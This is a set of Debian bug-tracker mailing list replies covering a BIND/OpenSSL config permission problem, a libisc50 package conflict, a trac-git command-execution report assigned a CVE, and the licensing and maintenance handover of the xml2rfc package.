> /usr/lib/ssl/openssl.cnf is a symlink to /etc/ssl/openssl.cnf,
> both provided by the package openssl. Unfortunately, on the
> respective machine, /etc/ssl/openssl.cnf is modified and not
> world-readable as it is by default after installing the openssl
> package.

Thanks for tracking this down.  I suspect that this is due to the
OPENSSL_config() call, but I need to check this in a debugger to be
sure.

However, OpenSSL's documentation says this:

   OPENSSL_config() configures OpenSSL using the standard
   openssl.cnf configuration file name using config_name. If
   config_name is NULL then the default name openssl_conf will be
   used. Any errors are ignored.

BIND uses the NULL argument, as far as I can tell.  So this might be
an OpenSSL bug.






Bug#584585: file conflict with libisc50

2010-06-04 Thread Florian Weimer
* Peter Palfrader:

> Unpacking libisc52 (from .../libisc52_1%3a9.6.ESV.R1+dfsg-0+lenny1_i386.deb) ...
> dpkg: error processing /var/cache/apt/archives/libisc52_1%3a9.6.ESV.R1+dfsg-0+lenny1_i386.deb (--unpack):
>  trying to overwrite `/usr/lib/libisc.so.50', which is also in package libisc50

Where does that come from?

f...@merkel:~$ dak ls libisc50
f...@merkel:~$ 

Stable has libisc40, and there are no conflicts with that TTBOMK.






Bug#584585: file conflict with libisc50

2010-06-04 Thread Florian Weimer
* Peter Palfrader:

>> Stable has libisc40, and there are no conflicts with that TTBOMK.
>
> Ah.  Apparently from the libisc50 that was in unstable (and testing?)
> with bind 9.6 at one point and its backport to lenny-backports.
>
> Hmm.

I'm not sure what to do about this.  Upload a -0+lenny2 with a
Conflicts:?  Post a follow-up to debian-security saying that if you
have installed backports, you should remove obsolete packages first?






Bug#560238: Status, client-side breakage

2010-05-30 Thread Florian Weimer
What's the status here?

I think the client-side breakage of v4-mapped addresses reported by
Guillaume Gimenez in

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560238#129

pretty much settles this.






Bug#567039: trac-git: Arbitrary command execution

2010-02-03 Thread Florian Weimer
* Stefan Göbel:

> Package: trac-git
> Version: 0.0.20080710-3
> Severity: grave
> Tags: patch security
> Justification: user security hole
>
>
> The trac-git package in Debian Lenny - if enabled in Trac - allows a
> remote attacker to execute arbitrary commands on the system with the
> rights of the user running Trac. The attacker must have the rights to
> browse the repository in order to exploit this issue, other parts of
> Trac are most likely not affected.

Thanks.  I have assigned CVE-2010-0394 to this issue.






Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

2009-12-02 Thread Florian Weimer
* Florian Weimer:

> * Daniel Kahn Gillmor:
>
>> What's the status on copyright clearance for the boilerplate included in
>> xml2rfc?  It would be useful to me to have the latest version available
>> through the repositories (even if it means moving it to non-free, though
>> i hope that wouldn't be necessary).
>
> We can't move it to non-free because as far as I can tell, we lack the
> distribution rights for the TLP because the TLP grants distribution
> rights for IETF activities only, and Debian is not an IETF activity.

I misread the document.  non-free is definitely a possibility.






Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

2009-12-02 Thread Florian Weimer
* Daniel Kahn Gillmor:

> What's the status on copyright clearance for the boilerplate included in
> xml2rfc?  It would be useful to me to have the latest version available
> through the repositories (even if it means moving it to non-free, though
> i hope that wouldn't be necessary).

We can't move it to non-free because as far as I can tell, we lack the
distribution rights for the TLP because the TLP grants distribution
rights for IETF activities only, and Debian is not an IETF activity.

I'm going to request additional permissions from the IETF trust.
Depending on the scope of those permissions, the package can remain in
main or will have to be moved to non-free.

I also plan to orphan the package because I don't use it myself and I
don't want to block anyone else from taking better care of it.






Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

2009-12-02 Thread Florian Weimer
* Daniel Kahn Gillmor:

> On 12/02/2009 02:00 PM, Florian Weimer wrote:
>> I misread the document.  non-free is definitely a possibility.
>
> If you think non-free is a reasonable choice for now, could you package
> up 1.34 and put it there while the request for DFSG-free licensing winds
> its way through whatever red tape it needs to?

I don't want to maintain packages in non-free.  But apart from that,
I think it's fine.

> i'd be up for taking over the package from you, but i'd want to know:
>
>  * how are you currently maintaining it?  For example, there are git
> references in debian/rules, but no Vcs-Git-* in debian/control.

There's a repository below http://git.enyo.de/fw/debian/, but I
think I botched my local copy, and actually uploaded the current
version without committing everything.  I might have fixed that now,
but there are no guarantees that the version in the Git repository is
actually the official one.  Sorry about that. 8-(

(If you clone from there, note that the box only has got about
1Mbps of bandwidth to the Internet, so it's kind of slow.)

> And i could find no indication of rationales (or details) for the
> changes that were made to make the package DFSG-Free.  looks like
> contrib was removed, as were drafts of rfc2629bis.  What made you
> decide these were not redistributable?  some of them (xml2rfcpp.pl,
> for example) appear to be explicitly placed in the public domain,
> for whatever that's worth.

Some of the example RFCs are non-free under Debian's policy.  Some
parts of contrib were not DFSG-compliant, either, and if there were
parts that were free software, I simply missed them.

>  * how are the requests for licensing changes being handled?  who are
> you currently in conversation with?  where do those conversations stand?
>  can i help out?

I asked on the tlp-interest list first, but that didn't lead to action
from the IETF, as far as I can tell.  I'm now following the official
procedure, as outlined in the TLP document.

> I'd like to have the latest version available so it's easy for debian
> folks to participate in the IETF process.  I'd also like to include
> idnits in the archive for the same reason, though it contains some
> boilerplate itself that i'm unclear on the licensing for.  perhaps it
> should just go in non-free as well.  ugh.

Yes, non-free seems to be the easiest option.

Other possible improvements for the package: xml2rfc phones home, this
should be patched out.  The XSLT file could be integrated into
Debian's XML toolchain, I think, but I'm not sure how to do this (I
had some trouble integrating the DTD, but it should work now).





